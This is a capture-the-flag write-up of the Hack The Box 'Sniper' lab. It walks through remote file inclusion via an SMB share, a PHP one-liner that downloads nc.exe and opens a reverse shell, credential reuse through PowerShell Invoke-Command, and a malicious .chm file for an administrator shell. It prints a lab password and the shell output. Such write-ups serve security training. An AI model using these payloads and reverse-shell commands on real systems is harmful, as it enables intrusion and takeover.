Hack the box(HTB) Sniper write up

Steps

1. Nmap scan
2. Finding RFI
3. Setting up Samba server
4. Getting reverse shell
5. Privilege escalation(Getting user.txt)
6. Basic enumeration
7. Making malicious .chm file
8. Getting the reverse shell(Getting root.txt)

Commands used

1. nmap -sC -sV -oV 10.10.10.151
2. nano /etc/samba/smb.conf
3. service smbd start
4. nc.exe 10.10.14.39 4444 -e cmd.exe
5. powershell
6. $username = ‘SNIPER\Chris’
7. $password = ’36mEAhz/B8xQ~2VM’
8. $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
9. $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
10. Invoke-command -computername SNIPER -credential $credential -scriptblock { cmd.exe /c “C:\tmp\nc.exe” -e powershell 10.10.14.39 1234 }
11. import-module .\out.chm.ps1;out-chm -Payload "C:\tmp\nc.exe -e powershell 10.10.14.39 8888" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"(Locally)

NMAP Scan

Nmap 7.70 scan initiated Wed Feb  5 09:25:46 2020 as: nmap -sC -sV -oV 10.10.10.151
 Nmap scan report for 10.10.10.151
 Host is up (0.64s latency).
 Not shown: 996 filtered ports
 PORT    STATE SERVICE       VERSION
 80/tcp  open  http          Microsoft IIS httpd 10.0
 | http-methods: 
 |_  Potentially risky methods: TRACE
 |_http-server-header: Microsoft-IIS/10.0
 |_http-title: Sniper Co.
 135/tcp open  msrpc         Microsoft Windows RPC
 139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
 445/tcp open  microsoft-ds?
 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
 Host script results:
 |clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s | smb2-security-mode:  |   2.02:  |    Message signing enabled but not required
 | smb2-time: 
 |   date: 2020-02-05 16:28:18
 |_  start_date: N/A
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done at Wed Feb  5 09:28:53 2020 -- 1 IP address (1 host up) scanned in 186.70 seconds

Finding RFI

So we have port 80 open so lets just see whats on the website.

After enumerating further I found RFI(Remote file inclusion) on the /blogs on the website

when i change the language i see a RFI so that was the initial foothold.

http://10.10.10.151/blog/?lang=blog-en.php

SO now it was time for getting a shell .For this I used a script.Here is the link.

https://github.com/incredibleindishell/Mannu-Shell/blob/master/mannu.php 

.And all credit goes to the writer of the script .I used this because its easy to use.

Another method can making on php file and present it on our samba server.

Setting up Samba server

So now our first step is configuration of samba server.

So now we have to find the file smb.conf

nano /etc/samba/smb.conf

Here is my smb.conf

root@kali:/etc/samba# cat smb.conf 
 [global]:
     security = user
     map to guest = bad user
     bind interfaces only = yes
     encrypt passwords = yes
     name resolve order = bcast host
     workgroup = WORKGROUP
     winbind use default domain = yes
     dns proxy = no
     server string = Samba Server %v
     winbind trusted domains only = yes
     null passwords = yes
     netbios name = indishell-lab
 [public]:
     force user = nobody
     path = /root/Desktop
     public = yes
     writeable = yes
     directory mask = 0755
     create mask = 0644
     browseable = yes

Now we can start or samba server.

root@kali:~/Desktop/htb# service smbd start

I specified the path in .conf file as /root/Desktop so my file is on Desktop first lets do it with mannu.php from indishell . I have given the link above.

name of share in my .conf file is public so don’t get confuse .

Getting reverse shell

http://10.10.10.151/blog/?lang=\10.10.14.39\public\mannu.php
http://10.10.10.151/blog/?lang=\local_ip\share_name\file_name

Now we can just make a tmp directory and upload a nc.exe. The usage is simple so can understand it easily.

Now lets get a reverse shell.

And we got a reverse shell.

We can do it by making our own .php file

<?php shell_exec('powershell iwr -uri 10.10.14.39:8000/nc.exe -o C:\Windows\Temp\nc.exe;C:\Windows\Temp\nc.exe -e powershell 10.10.14.39 4444')?>
This lets us intsall nc.exe and get reverse shell back on our local machine.

After some enumeration i got db.php which contained creds for Chris.

Privilege escalation(Getting user.txt)

So now its time to jump to chris user.

$username = 'SNIPER\Chris'
 $password = '36mEAhz/B8xQ~2VM'
 $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
 $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
 Invoke-command -computername SNIPER -credential $credential -scriptblock { cmd.exe /c "C:\tmp\nc.exe" -e powershell 10.10.14.39 1234 }

So now we got shell as chris and also got the user flag.

Basic enumeration

After some enumeration i found a note.txt

PS C:\users\chris\Downloads> ls ls     Directory: C:\users\chris\Downloads Mode                LastWriteTime         Length Name                                                                   ----                -------------         ------ ----                                                                   -a----        4/11/2019   8:36 AM          10462 instructions.chm                                                       PS C:\users\chris\Downloads>  

PS C:> cd Docs
 cd Docs
 PS C:\Docs> ls
 ls
 Directory: C:\Docs
 Mode                LastWriteTime         Length Name                                                                  
 ----                -------------         ------ ----                                                                  
 -a----        4/11/2019   9:31 AM            285 note.txt                                                              
 -a----        4/11/2019   9:17 AM         552607 php for dummies-trial.pdf                                             
 PS C:\Docs> cat note.txt 
 cat note.txt
 Hi Chris,
     Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.
 Regards,
 Sniper CEO.
 PS C:\Docs> 

I think these information are enough to understand that chirs boss whats a .chm file in the /docs directory.

So we can now make a malicious file and upload it to docs and when boss will run it we will be admin.

Making malicious .chm file

So i got a file on github https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1

Now to compile the file we need to run it in windows box.

Once we have downloaded it we can create a malicious .chm file

import-module .\out.chm.ps1;out-chm -Payload "C:\tmp\nc.exe -e powershell 10.10.14.39 8888" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

Getting the reverse shell(Getting root.txt)

Now we just have to move our file to docs.

So now we can listen on nc -nlpv 8888

root@kali:~/Desktop/htb/sniper# nc -nlvp 8888
 listening on [any] 8888 …
connect to [10.10.14.39] from (UNKNOWN) [10.10.10.151] 49959
 Windows PowerShell 
 Copyright (C) Microsoft Corporation. All rights reserved.
 PS C:\Windows\system32> whoami
 whoami
 sniper\administrator
 PS C:\Windows\system32>

So now we got shell as admin.

PS C:\users\Administrator\Desktop> cat root.txt
 cat root.txt
 5624***c15
 PS C:\users\Administrator\Desktop>